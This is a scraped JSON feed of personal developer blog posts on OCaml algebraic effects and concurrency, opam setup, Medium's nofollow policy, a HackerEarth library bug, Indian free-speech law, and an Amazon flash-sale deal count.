(Hashtbl.find ht x);\n      Hashtbl.remove ht x;\n      resume ht xs\n  in\n  resume read_ht rdy_rd_fds;\n  resume write_ht rdy_wr_fds;\n  if timeout >= 0. then ignore (wakeup (Unix.gettimeofday ())) else ();\n  dequeue ()\n\n\nThe\nprogram\nimplements a simple echo server. The server listens on localhost port 9301. It\naccepts multiple clients and echoes back to the client any data sent to the\nserver. This server is a direct-style reimplementation of the echo server found\nhere,\nwhich implements the echo server in CPS style:\n(* Repeat what the client says until the client goes away. *)\nlet rec echo_server sock addr =\n  try\n    let data = recv sock 1024 in\n    if String.length data > 0 then\n      (ignore (send sock data);\n       echo_server sock addr)\n    else\n      let cn = string_of_sockaddr addr in\n      (printf \"echo_server : client (%s) disconnected.\\n%!\" cn;\n       close sock)\n  with\n  | _ -> close sock\n\n\nThe echo server can be tested with a telnet client by starting the server and\non the same machine running telnet localhost 9301.\nConclusion\nThe aim of the post is to illustrate the variety of alternative programming\nparadigms that arise due to algebraic effects and handlers, and hopefully\nkindle interest in reasoning and programming with effects and handlers in\nOCaml. Algebraic effects and handlers support in OCaml is in active development\nwithin the context of multicore\nOCaml. When you find those\ninevitable bugs, please report them to the issue\ntracker.\nProgramming with Algebraic Effects and Handlers (pdf) ↩\nProgramming and Reasoning with Algebraic Effects and Dependent Types (pdf) ↩",[],{"slug":2759,"title":2760,"link":2761,"pubDate":2762,"contentSnippet":2763,"tags":2764,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"effects-multicore","Effective Concurrency with Algebraic Effects","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002F2015\u002F05\u002F20\u002Feffects-multicore\u002F","2015-05-20T14:04:00.000Z","Algebraic effects and handlers provide a modular abstraction for expressing\neffectful computation, allowing the programmer to separate the expression of an\neffectful computation from its implementation. In this post, I will present an\nextension to OCaml for programming with linear algebraic effects, and\ndemonstrate its use in expressing concurrency primitives for multicore\nOCaml. The design and\nimplementation of algebraic effects for multicore OCaml is due to Leo\nWhite, Stephen Dolan and\nthe multicore team at OCaml\nLabs.\nMotivation\nMulticore-capable functional programming language implementations such as\nGlasgow Haskell Compiler,\nF#, Manticore and\nMultiMLton expose one or more\nlibraries for expressing concurrent programs. The concurrent threads of\nexecution instantiated through the library are in turn multiplexed over the\navailable cores for speed up. A common theme among such runtimes is that the\nprimitives for concurrency along with the concurrent thread scheduler is baked\ninto the runtime system. Over time, the runtime system itself tends to become a\ncomplex, monolithic piece of software, with extensive use of locks, condition\nvariables, timers, thread pools, and other arcana. As a result, it becomes\ndifficult to maintain existing concurrency libraries, let alone add new ones.\nSuch lack of malleability is particularly unfortunate as it prevents developers\nfrom experimenting with custom concurrency libraries and scheduling strategies,\npreventing innovation in the ecosystem. Our goal with this work is to provide a\nminimal set of tools with which programmers can implement new concurrency\nprimitives and schedulers as OCaml libraries.\nA Taste of Effects\nA Simple Scheduler\nLet us illustrate the algebraic effect extension in multicore OCaml by\nconstructing a concurrent round-robin scheduler with the following interface:\n(* Control operations on threads *)\nval fork  : (unit -> unit) -> unit\nval yield : unit -> unit\n(* Runs the scheduler. *)\nval run   : (unit -> unit) -> unit\n\n\nThe basic tenet of programming with algebraic effects is that performing an\neffectful computation is separate from its interpretation1.\nIn particular, the interpretation is dynamically chosen based on the context in\nwhich an effect is performed. In our example, spawning a new thread and\nyielding control to another are effectful actions, for which we declare the\nfollowing effects:\ntype _ eff +=\n| Fork  : (unit -> unit) -> unit eff\n| Yield : unit eff\n\n\nThe type 'a eff is the predefined extensible variant type for effects,\nwhere 'a represents the return type of performing the effect. For\nconvenience, we introduce new syntax using which the same declarations are\nexpressed as follows:\neffect Fork  : (unit -> unit) -> unit\neffect Yield : unit\n\n\nEffects are performed using the primitive perform of type 'a eff -> 'a. We\ndefine the functions fork and yield as follows:\nlet fork f = perform (Fork f)\nlet yield () = perform Yield\n\n\nWhat is left is to provide an interpretation of what it means to perform\nfork and yield. This interpretation is provided with the help of\nhandlers.\n\n\n\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18\n19\n\nlet run main =\n  let run_q = Queue.create () in\n  let enqueue k = Queue.push k run_q in\n  let rec dequeue () =\n    if Queue.is_empty run_q then ()\n    else continue (Queue.pop run_q) ()\n  in\n  let rec spawn f =\n    match f () with\n    | () -> dequeue ()\n    | exception e ->\n        print_string (to_string e);\n        dequeue ()\n    | effect Yield k ->\n        enqueue k; dequeue ()\n    | effect (Fork f) k ->\n        enqueue k; spawn f\n  in\n  spawn main\n\n\n\n\n\nThe function spawn f (line 8) evaluates f in a new thread of control. f\nmay return normally with value () or exceptionally with an exception e or\neffectfully with the effect performed along with the delimited\ncontinuation2 k. In the pattern effect e k, if the\neffect e has type 'a eff, then the delimited continuation k has type\n('a,'b) continuation, i.e., the return type of the effect 'a matches the\nargument type of the continuation, and the return type of the delimited\ncontinuation is 'b.\nObserve that we represent the scheduler queue with a queue of delimited\ncontinuations, with functions to manipulate the queue (lines 2–6). In the case\nof normal or exceptional return, we pop the scheduler queue and resume the\nresultant continuation using the continue primitive (line 6). continue k v\nresumes the continuation k : ('a,'b) continuation with value v : 'a and\nreturns a value of type 'b. In the case of effectful return with Fork f\neffect (lines 16–17), we enqueue the current continuation to the scheduler\nqueue and spawn a new thread of control for evaluating f. In the case of\nYield effect (lines 14–15), we enqueue the current continuation, and resume\nsome other saved continuation from the scheduler queue.\nTesting the scheduler\nLets write a simple concurrent program that utilises this scheduler, to create\na binary tree of tasks. The sources for this test are available\nhere. The program\nconcurrent.ml:\nlet log = Printf.printf\n\nlet rec f id depth =\n  log \"Starting number %i\\n%!\" id;\n  if depth > 0 then begin\n    log \"Forking number %i\\n%!\" (id * 2 + 1);\n    Sched.fork (fun () -> f (id * 2 + 1) (depth - 1));\n    log \"Forking number %i\\n%!\" (id * 2 + 2);\n    Sched.fork (fun () -> f (id * 2 + 2) (depth - 1))\n  end else begin\n    log \"Yielding in number %i\\n%!\" id;\n    Sched.yield ();\n    log \"Resumed number %i\\n%!\" id;\n  end;\n  log \"Finishing number %i\\n%!\" id\n\nlet () = Sched.run (fun () -> f 0 2)\n\n\ngenerates a binary tree of depth 2, where the tasks are numbered as shown\nbelow:\n\nThe program forks new tasks in a depth-first fashion and yields when it reaches\nmaximum depth, logging the actions along the way. To run the program, first\ninstall multicore OCaml compiler, available from the OCaml Labs dev\nrepo. Once the compiler is\ninstalled, the above test program can be compiled and run as follows:\n$ git clone https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Focaml-eff-example\n$ cd ocaml-eff-example\n$ make\n$ .\u002Fconcurrent\nStarting number 0\nForking number 1\nStarting number 1\nForking number 3\nStarting number 3\nYielding in number 3\nForking number 2\nStarting number 2\nForking number 5\nStarting number 5\nYielding in number 5\nForking number 4\nStarting number 4\nYielding in number 4\nResumed number 3\nFinishing number 3\nFinishing number 0\nForking number 6\nStarting number 6\nYielding in number 6\nResumed number 5\nFinishing number 5\nFinishing number 1\nResumed number 4\nFinishing number 4\nFinishing number 2\nResumed number 6\nFinishing number 6\n\n\nThe output illustrates how the tasks are forked and scheduled.\nImplementation\nFibers for Concurrency\nThe main challenge in the implementation of algebraic effects is the efficient\nmanagement of delimited continuations. In multicore OCaml3, the delimited\ncontinuations are implemented using fibers, which are small heap-allocated,\ndynamically resized stacks. Fibers represent the unit of concurrency in the\nruntime system.\nOur continuations are linear (one-shot)4, in that once captured,\nthey may be resumed at most once. Capturing a one-shot continuation is fast,\nsince it involves only obtaining a pointer to the underlying fiber, and\nrequires no allocation. OCaml uses a calling convention without callee-save\nregisters, so capturing a one-shot continuation requires saving no more context\nthan that necessary for a normal function call.\nSince OCaml does not have linear types, we enforce the one-shot property at\nruntime by raising an exception the second time a continuation is invoked. For\napplications requiring true multi-shot continuations (such as probabilistic\nprogramming5), we envision providing an explicit operation to copy\na continuation.\nWhile continuation based concurrent functional programming runtimes such as\nManticore and MultiMLton use undelimited continuations, our continuations are\ndelimited. We believe delimited continuations enable complex nested and\nhierarchical schedulers to be expressed more naturally due to the fact that\nthey introduce parent-child relationship between fibers similar to a function\ninvocation.\nRunning on Multiple Cores\nMulticore OCaml provides support for shared-memory parallel execution. The unit\nof parallelism is a domain, each running a separate system thread, with a\nrelatively small local heap and a single shared heap shared among all of the\ndomains. In order to distributed the fibers amongst the available domains, work\nsharing\u002Fstealing schedulers are initiated on each of the domains. The multicore\nruntime exposes to the programmer a small set of locking and signalling\nprimitives for achieving mutual exclusion and inter-domain communication.\nThe multicore runtime has the invariant that there are no pointers between the\ndomain local heaps. However, the programmer utilising the effect library to\nwrite schedulers need not be aware of this restriction as fibers are\ntransparently promoted from local to shared heap on demand. We will have to\nsave multicore-capable schedulers for another post.\nEff ↩\nRepresenting Monads ↩\nMulticore OCaml (pdf) ↩\nRepresenting Control in the presence of One-shot Continuations ↩\nEmbedded domain-specific language HANSEI for probabilistic models and (nested) inference ↩",[],{"slug":2766,"title":2767,"link":2768,"pubDate":2769,"contentSnippet":2770,"tags":2771,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"medium-abuses-nofollow","Medium abuses nofollow","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F04\u002F06\u002Fmedium-abuses-nofollow\u002F","2015-04-06T00:00:00.000Z","Update: Since I published this post, I have changed my opinion somewhat on the matter. This post is quite confrontational and I didn’t mean it to be that way. Medium is not wrong in this matter, but I still think we need to look for better solutions. I have since been working on a proposal\u002Fidea that would use machine learning to “solve” this problem, instead of side-stepping it.\nI call medium a “mostly good” platform for lazy writers. A lot of people have written about its excellent typography, or it being the next “big publishing platform”. I’ve used medium in the past, and while it does have its benefits, I have stopped using it.\nMy primary reason was that I already have a blog, where I can control the entire experience. This is the same reason why New York Times does not start publishing articles on Medium.\nThe other reason is nofollow abuse.\nMedium hosts more than 1M indexed pages. It has around 650k users currently by a conservative estimate. Rounding it to 700k to account for other users, collections, and other internal pages, it leaves us with around 300,000 articles on medium.\nA basic tenet of the web is linkability. That is what Tim Berners Lee meant when he talked about HyperText:\nHyperText is a way to link and access information of various kinds as a web of nodes in which the user can browse at will.\nOver time, the web has evolved, and is now not just limited to human users, but to computers as well. This is an important consideration on which the web rests today. The biggest example of this is Google Search, which uses these links to “follow, spider, and index” the web. Google uses this linking information to build a citation index, which gives us the quality of a web page depending on the quality and number of sites that link to it.\nIf you know a bit or two about SEO, you might have heard of shady backlink techniques, which essentially amount to you getting links from an established site. This often takes the form of user-generated content such as comments and answers.\nWhile fighting spam is important, it is far more important to make sure that web remains linked, that people are credited for the content they create. Medium hosts 300,000 articles published by half a million users, and yet none of these links back to external website, because of something called “rel=nofollow”.\nWhen a link has a rel=nofollow attribute, search engines do not count it as a citation in their index. While this may be the right strategy for comments on a wordpress blog to prevent spam, this is not the right way to move forward if you want to “revolutionize the publishing industry”.\nWhile medium is not as bad as some other sites in this regard (like quora, which even blocks the internet archive), it is very important because it portrays itself as a “publishing platform”. This means, medium is made up of articles, blog posts, with lots of outbound links compared to, for instance, StackOverflow answers (which solved this problem back in 2011).\nIf you publish content on medium, and provide relevant links for your readers, remember that these links are not considered as relevant by search engines.\nMedium has said that this is not a top priority at the moment for them.\nI understand completely. Handling spam would be a far more harder problem to solve than just blacklisting all outbound links. But we cannot go this way, if we want an open web. We need publishing platforms that cite content, and not blacklist it. This is why I write content on my own blog, and not on medium.",[],{"slug":2773,"title":2774,"link":2775,"pubDate":2776,"contentSnippet":2777,"tags":2778,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"opam-switch-to-multicore","Opam Switch to Multicore OCaml","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Fopam\u002Focaml\u002F2015\u002F03\u002F25\u002Fopam-switch-to-multicore\u002F","2015-03-25T18:15:00.000Z","OPAM has a great compiler\nswitch feature that lets you\nsimultaneously host several OCaml installations, each with its own compiler\nversion and a set of installed packages. I wanted to use the power of opam\nswitch for working with the experimental multicore\nOCaml compiler. The key\nadvantage of doing this is that it lets you easily install packages from the\nOPAM repository, while sandboxing it from other OCaml\ninstallations on your system. The post will show how to create OPAM compiler\nswitch for multicore OCaml.\nInstall opam-compiler-conf\nThe first step is to install Gabriel Scherer’s opam-compiler-conf\nscript which lets you do opam\nswitches on local installations:\n$ git clone https:\u002F\u002Fgithub.com\u002Fgasche\u002Fopam-compiler-conf\n$ cd opam-compiler-conf\n$ mkdir -p ~\u002F.local\u002Fbin\n$ make BINDIR=~\u002F.local\u002Fbin install\n\n\nThis installs the opam-compiler-conf script under ~\u002F.local\u002Fbin. Make sure\nthis directory is under your search path. Now, $opam compiler-conf should\ngive you the list of available commands.\nBuild multicore OCaml locally\nTyping opam switch should list the compilers currently installed in your\nsystem and those that are available. For instance, here is my setup:\n$ opam switch\nsystem  C system  System compiler (4.02.1)\n4.02.1  I 4.02.1  Official 4.02.1 release\n4.02.0  I 4.02.0  Official 4.02.0 release\n4.01.0  I 4.01.0  Official 4.01.0 release\n--     -- 3.11.2  Official 3.11.2 release\n--     -- 3.12.1  Official 3.12.1 release\n--     -- 4.00.0  Official 4.00.0 release\n--     -- 4.00.1  Official 4.00.1 release\n# 66 more patched or experimental compilers, use '--all' to show\n\n\nYou can easily switch between the installations using opam switch\n[system-name]. Let us now install multicore OCaml as a new switch:\n$ git clone https:\u002F\u002Fgithub.com\u002Focamllabs\u002Focaml-multicore\n$ cd ocaml-multicore\n$ opam compiler-conf configure\n$ make world\n$ opam compiler-conf install\n$ eval `opam config env`\n\n\nThe multicore compiler is now installed and has been made the current compiler:\n$ opam switch\nsystem                      I system                      System compiler (4.02.1)\n4.02.1+local-git-multicore  C 4.02.1+local-git-multicore  Local checkout of 4.02.1 at \u002FUsers\u002Fkc\u002Focaml-multicore\n4.02.1                      I 4.02.1                      Official 4.02.1 release\n4.02.0                      I 4.02.0                      Official 4.02.0 release\n4.01.0                      I 4.01.0                      Official 4.01.0 release\n--                         -- 3.11.2                      Official 3.11.2 release\n--                         -- 3.12.1                      Official 3.12.1 release\n--                         -- 4.00.0                      Official 4.00.0 release\n--                         -- 4.00.1                      Official 4.00.1 release\n# 66 more patched or experimental compilers, use '--all' to show\n\n\nThis can be confirmed by:\n$ ocamlc -version\n4.02.1+multicore-dev0\n\n\nwhich shows the current OCaml bytecode compiler version.\nWorking with the local switch\nEvery time you change the compiler source, you need to rebuild the compiler and\nreinstall the switch:\n# Changed compiler source...\n$ make world\n$ opam compiler-conf reinstall\n\n\nThe local installation can be removed by opam compiler-conf uninstall.",[],{"slug":2780,"title":2781,"link":2782,"pubDate":2783,"contentSnippet":2784,"tags":2785,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"josd-talk","Blog post on recent talk","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F03\u002F20\u002Fjosd-talk\u002F","2015-03-20T00:00:00.000Z","So I recently did a talk on Joy of Software Development. You can read more about the talk here (link includes slides and list of topics covered). This post is devoted to the references I’d promised to link to in the talk. Since it was an introductory talk, and I didn’t want to bore people to death, I decided to cover lots of topics at a shallow depth, instead of covering a few topics deeply.\nThis means that I need to post more material for people to follow up on. So, this is that reference blog post. Make sure you have a copy of the slides open as you go through these links.\nUpdate: I also gave this talk (with a few updates) at GeekSkool in October 2015.\nSoftware Development in general\nHiring in software industry is broken\nBreadth First Learning\nRecommended readings for developers by Jeff Atwood (codinghorror)\nShip v1, even if it sucks\nShip early, ship often\nNever rewrite, always refactor by Joel Spolsky\nThe Joel Test to score a software company.\nSoftware Security\nSecurity is the opposite of obscurity\nOWASP Top 10\nSoftware Security course on coursera\nCTFTime - See upcoming CTF contests\nSmashTheStack - Learn buffer overflow attacks\nNebula Exploit Excercises\nBackdoor - Security CTF platform for beginners by SDSLabs\nStarting Advice\nUse bcrypt\nAsk questions on Security.SE\nPrinciple Of Least Privilege\nNever trust user input\nAgnostic Software Development\nWhat should I do to be language-agnostic?\nSeven languages in seven weeks (Book)\nRight tool for the job\nLanguage Agnostic\nBalance between “right tool for the job” and familiarity\nFree and open source development\nWhy Open Source misses the point of Free Software - by Richard Stallman\nOpen source definition\nChoose a license\nWhat is free software?\nWhy Free Software Movement is important\nMozilla mission statement\nVersion Control\nPro Git (Book)\nLearn Git in your browser\nHg Init Mercurial tutorial\nDifference betweeng Hg and Git\nBenefits of git\nMust read post on git branching model\nGit in 20 commands\nTests\nDuring the talk, I decidedly used the term TDD incorrectly. TDD technically means going test first, but I used it as an introduction to testing in general. This was intentional. The links here will use TDD in the correct sense.\nTest Driven Development Tutorial\nWhy TDD works\nHow much to cover in tests\nImportance of testing - Jeff Atwood\nBenefits of going test first\nTesting culture at github\nSource code I used in talk\nREST and APIs\nWhy was REST a breakthrough\nA simple lucid explanation of REST\nWhat API to use\nNIH Syndrome\nUnix Philosophy\nThe epic Knuth vs McIlroy story\nZawinski’s Law\nhttp:\u002F\u002Fonethingwell.org\u002F\nWikipedia article on the topic is surprisingly good\nGood examples of pipes\nBooks\nThese are books i absolutely recommend every software developer to read, in order.\nDon’t Make Me Think\nThe Pragmatic Programmer\nOther than these, I recommend reading Code Complete, Mythical Man Month, and everything by Jeff Atwood and Zach Homan, but only after you have read the above 2 books.\nHow to get better at Software Development?\nThis is just a small list of topics I cover in a recent blog post. This is only present\nin the updated version of the talk which I gave at GeekSkool. You can read the blog\npost here to look at the points I make.\nPhew. That was a lot of links. If you are ever interested in learning more about software development, feel free to contact me. If you ever feel like chatting with me, I’m usually online at chat.sdslabs.co.",[],{"slug":2787,"title":2788,"link":2789,"pubDate":2790,"contentSnippet":2791,"tags":2792,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"buxtons-rule","Buxton's Rule","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F03\u002F08\u002Fbuxtons-rule\u002F","2015-03-08T00:00:00.000Z","I consider myself a UX enthusiast. I consider that term to aptly describe my interest in UX. As I’m deeply involved in many UX and design decisions, I try to be well read on design and UX principles. While reading a discussion about iPhone prototypes on HN in June ‘12, I came across this comment:\nGoes to show what it takes to achieve excellence: lots of trial and error. Produce at least 3 alternatives for every design decision (Bill Buxton agrees).\n— mstuherl\nIt sounded so basic, yet often I see designers trying to defend their first design, because it seems good enough to them. No good design is ever born at the first step. Just like any other process, it takes multiple iterations to perfect it.\nI recently got in touch with Morgan (mstuherl on HN), and thanked him for his comment. Here’s what he said when I told him I wanted to dub it mstuherl’s rule:\nHah! My name’s Morgan, so you can call it Morgan’s Rule if you like, but it comes from Bill, so Buxton’s rule would be more appropriate. His book Sketching User Experience contains yet more wisdom!\nSo thats what I’m calling it:\nFurther Reading\nIteration in the Design of the Human-Computer Interface - Bill Buxton\nSketching User Experiences by Bill Buxton\nDon’t Make Me Think by Steve Krug (My first recommendation to every software dev\u002Fdesigner)",[],{"slug":2794,"title":2795,"link":2796,"pubDate":2797,"contentSnippet":2798,"tags":2799,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"scythe-ctf-updates","scytheCTF and Updates","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F02\u002F27\u002Fscythe-ctf-updates\u002F","2015-02-27T00:00:00.000Z","February has been an interesting month for me. I haven’t been programming a lot, but have definitely been writing a lot. I have got a few more upcoming projects as well, which I’d love to announce soon.\nWe recently held a short 8-hour CTF (scytheCTF) on Backdoor. I made two challenges for the CTF:\nSHITTY-OTP\nLOST-FOUND\nBoth of these problems were rush jobs because of several reasons:\nWe didn’t have much time to set the problems.\nWe didn’t expect much participation in scytheCTF.\nscytheCTF was a test CTF, just to figure out any issues with the internet launch of Backdoor.\nscythe is also supposed to be beginner friendly, unlike our annual BackdoorCTF, which will include much harder problems.\nI had a lot of fun with @kandoiabhi in setting the problems. It was also great seeing @DefConUA participate in such a small-scale contest.\nOther than scythe, we recently had our annual SDSLabs trip to Rishikesh, which I enjoyed a lot. I also wrote a small post on my work setup.",[],{"slug":2801,"title":2802,"link":2803,"pubDate":2804,"contentSnippet":2805,"tags":2806,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"hackerearth-bug","How I found a bug in HackerEarth","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F02\u002F12\u002Fhackerearth-bug\u002F","2015-02-12T00:00:00.000Z","Source\nI am not a competitive programmer. I love programming, but more so I love building things. As a result, I rarely participate in coding contests. Even when I do, I try to use languages like Ruby and Python just to see if I can do it my way, so to speak.\nWhile trying a contest in Ruby, I realized that I could not use the ruby prime library. This is a standard library in Ruby for a long while, and HackerEarth platform runs on 2.1.1, which is quite new.\nI reported this as a bug to HackerEarth in September ‘14. A quick reply from HE made me realize that they weren’t understanding the issue:\nModules like mathn or erb are part of standard library. They are available.\nTry using, require ‘erb’require ‘mathn’ in code editor.\nI decided to do some tests and check all standard libraries for their availability. For those unfamiliar with Ruby, this is how you load a standard library in ruby:\nrequire 'prime'\nUsing the HackerEarth API, I was able to write some quick code that tested all expected libraries:\n\nwhile read lib; do\n  SOURCE=\"require%20'$lib'\"\n  echo \"Testing $lib\"\n  curl -s -d \"client_secret=API_SECRET&lang=RUBY&async=0&source=$SOURCE\" http:\u002F\u002Fapi.hackerearth.com\u002Fcode\u002Frun\u002F > $lib.json\ndone \u003C libs.txt\n\n\nHere libs.txt contains a list of all standard libraries. The above code is in bash, and makes use of curl. Parsing the results, I replied with the following:\nRequiring the following libraries raises a missing error:\ncoverage - RE\nHackerEarth admitted the issue (I posted code to replicate on github), and have since worked on it. I just ran the tests again, and only the following libraries are unavailable now:\ncurses - RE\nA few of these are understandable (win32 since HE platform runs on Linux, and tk, which is a graphical library). A few of these are unavailable in Ruby 2.1.1 (I copied the list of libs from the 2.1.3 docs).\nKudos to HackerEarth for fixing a bug that very few of their users would have faced. All the source code for this post can be found at github.\nNote: This article was copied from HackerEarth because they are shutting down their notes platform.",[],{"slug":2808,"title":2809,"link":2810,"pubDate":2811,"contentSnippet":2812,"tags":2813,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"i-am-offended","I am offended","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F02\u002F06\u002Fi-am-offended\u002F","2015-02-06T00:00:00.000Z","To start with, here’s a piece of art that is meant to offend you:\n\nThe above is an artwork by MF Hussain. Its was sold as an untitled work by Hussain to a private collector, but was named Bharat Mata later when it was sold in an auction.\nWere you offended by looking at it? Maybe.\nDoes it look vulgar and offensive to you? Perhaps.\nWhat should you do as a result?\nCLOSE THE TAB!\nSeriously, India. The right thing to do when you are offended is not to lynch a person to death, or to issue a fatwa against singing the national song. The right thing to do is this:\n\nThe right to get offended in India is a result of the way our constitution curbs the freedom of speech. However, these restrictions were not in the constitution that was passed when India was made a republic (26 Jan 1950). It was added as the First Amendment (ironic, I know), which passed in June 1951.\nIn the 18 months that passed between these two events, Indians had the right to absolute freedom of speech. I won’t go into the details of why both Nehru and Patel thought of bringing these restrictions (for the better of India), but needless to say, the reasons are no longer valid.\nHowever, I found a curious piece of irony while researching this:\nOne of the prime opponents to the First Amendment restrictions was Syama Prasad Mookerjee, a long time RSS activist, founder of the Bharatiya Jana Sangh and widely regarded as the godfather of Hindu Nationalism.\nAnd now today, 64 years later, these restrictions are getting enacted into even more draconian laws. One such law is Section 66A of the Information Technology Act.\nKapil Sibal, former union minister writes about it:\nAllowing the government to regulate the internet is a recipe for disaster. Government being what it is, it would use such power to further its own ends.\nHowever, he gives in to the diplomatic reasoning and writes further:\nI know where I stand. I am for freedom of expression, but there are no absolutes in life. Limitless freedom contains within it the seeds of conflict. We must eschew conflict and embrace freedom, for peace and harmony.\nNote that back in 2012, Kapil Sibbal had spoken in favor of Section 66A, citing it as a tool to protect women online. He seems to have reversed his stance since.\nThis is what Tushar Mehta, Additional Solicitor General has to say on the necessity of the act:\n[…] every institution and every person right from the President can be subjected to criticism and it is people’s fundamental right to free speech and expression but such rights do not cover grossly offensive comments and posts on social networking sites.\nAIB recently tested their rights by making a grossly offensive video and posting it on social networking sites. A lot of people were offended. The video was taken down as a result.\nDid the people who were offended see the video? Yes, probably on YouTube. But the recordings are still floating around, and are available on torrents very easily.\nYou see, the internet is a resilient beast. You can’t control it, or bend it to your will. It does not run by your rules, and your sense of sensibility. It has no concept of right or wrong. It just is.\nA nation where I am afraid to post critical views of the government or discuss events that might offend someone is not a nation worth living in.\nThe internet cannot be regulated. You might certainly think of it as possible, but we will always find a way.\nIf you are offended it is your problem, and frankly lots of things offend lots of people. - Salman Rushdie\nI don’t think I will ever see the first amendment repealed in my lifetime. However, I’m gonna try my very best to get the Supreme Court to re-evaluate Section 66A as unconstitional and over-reaching.\nIf you want to let the government know of your thoughts on the matter, the Assistant Solicitor General (representing the Government in the case) can be reached at tusharmehta64@yahoo.com.\nFurther Reading\nThis is a loose list of various references and readings on the topic.\nA Story of Censorship: How the Right to Take Offense is Shrinking Free Speech in India - A video seminar on the topic by Anuradha Raman, Outlook Magazine\nFirst Amendment of the Constitution of India\nWhy Nehru and Sardar Patel curbed freedom of expression in India - A nice summary of the events that lead to the passing of the First Amendment\nBharat Mata a work of art - A ruling by the Supreme Court declaring the topmost image in this post as a work of art, and that no one gets scandalized looking at art.\nRestrictions on freedom of speech in India\nAn excellent piece on abolishing the restrictions on free speech titled Of writers and poets who criticize with their pens (Rajeev Mantri)\nA few pieces on the ongoing panel: India Today, Indian Express, Firstpost’s Summary\nThanks to Shashank Mehta and Ravi Kishore for reviewing drafts of this.",[],{"slug":2815,"title":2816,"link":2817,"pubDate":2818,"contentSnippet":2819,"tags":2820,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"are-you-a-fighter-pilot","Are you a fighter pilot?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F01\u002F28\u002Fare-you-a-fighter-pilot\u002F","2015-01-28T00:00:00.000Z","As part of a pre job interview for a position as a security consultant, I was asked this question. The interviewer expanded the question further as :\nGiven the choice between a luxurious journey in a passenger jetliner (flying business class) and a thrilling trip as a fighter pilot, which one would you choose?\nMy immediate reply was (without a single doubt): “I’ll take the fighter jet, thanks.”\nThen the interviewer tried to dissuade me from my choice: “Its not as glamorous as it sounds. Its a terrible job flying a jet plane. There are lots of complications, you are literally defying death, and even the pay isn’t that good.”. He then spent quite some time explaining the luxuries and comforts that we take for granted in a passenger jet, and those that aren’t available in a fighter jet. “You can’t even piss properly”, he told me. “And there’s free booze on the Boeing.”\nMe (after some deliberation and moment of self-doubt): I’d ultimately like to have my own private jet, but I’m willing to strap myself to a 300 million dollar plane just trying to get there. I’d take that over a passenger jet any day.\nFor those who didn’t get the analogy: He was trying to convince me to join a high risk job, where I’d be working late nights doing what I love. But it also means giving up tons of luxuries and comforts that I could get at other companies.\nI’m sure that I’m the fighter jet kind of person, I’m just having difficulty deciding what jet I wanna fly. If you have an opening for a Full Stack Developer\u002FSecurity Consultant, shoot me a mail.",[],{"slug":2822,"title":2823,"link":2824,"pubDate":2825,"contentSnippet":2826,"tags":2827,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"yu-yureka","Yu were mislead","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F01\u002F13\u002Fyu-yureka\u002F","2015-01-13T00:00:00.000Z","I was eagerly awaiting the release of Yu Yureka, which has been widely hailed as a great budget phone by most reviews. I won’t go into the details of the phone, but rather the flash sale that took place on 13th Jan ‘15 (on amazon.in). Far from being a well-managed affair, the website was plagued with issues, and went down for everyone a couple of minutes before the sale.\nStill, a few lucky people were able to buy the phone (sadly, I wasn’t one of them). Micromax said that they had to close registrations for the sale early and had around 3 lakh people lined up for the sale.\nThis is how the yuplaygod.com homepage looks right now:\n\nClearly, they had 10k units for sale, and one in every 300 people should have bought it, right? Wrong!\nIt seems Yu (the brand new subsidiary of Micromax) is not above lying. There were only 3000 devices on sale today, out of which only 2657 were claimed, after which the sale was shut down.\nHow do I know this? The way deals work on amazon is once you are on a deal page, the client keeps checking the deal status every few seconds so as to let you know as soon as its status changes. This deal status response does not only include the deal status code (say EXPIRED\u002FSOLDOUT\u002FAVAILABLE), but also includes the deal’s nitty details.\nThese details include:\ntotalCouponCount: 3000\nclaimedCouponCount: 2657\npercentClaimed: 88\ntype: LIGHTNING_DEAL\ntitle: Yureka\ndealPrice: 8999\ncurrentPrice: 12999\nI’m not sure why Yu would try such a tactic (hype the device at low cost, overstate sales figures and then switch to a higher price), but it sure does not sound nice if you are one of the 3 lakh people who lined up to buy the device.\nReferences\nSince its my word against amazon, here’s a simple way to confirm the deal details for yourself:\nVisit http:\u002F\u002Fhurl.it\u002F (I don’t own this site)\nChange the request method to “POST” from “GET”\nEnter http:\u002F\u002Fwww.amazon.in\u002Fxa\u002Fdealcontent\u002Fv2\u002FGetDealStatus where it says yourapihere.com\nClick on “+ Add Body Button”\nPaste {\"requestMetadata\":{\"marketplaceID\":\"A21TJRUUN4KGV\",\"clientID\":\"goldbox\"},\"dealTargets\":[{\"dealID\":\"ea9fef51\",\"itemIDs\":null}]} into the box that appears\nClick on “Launch Request”\nScroll to the bottom to see the dealStatus\nAs an alternative, here is a permalink to the request.\nUpdate: If you try to replicate the above steps, you will notice that the deal response is now blank. My guess is that the deal was deleted from the servers. However, the permalinks above should still work. I’m still waiting for any official word from either Yu\u002FAmazon.\nHere’s a better (edited) photo that Yu might wanna use:\n\nThanks to Shashank Mehta for the title 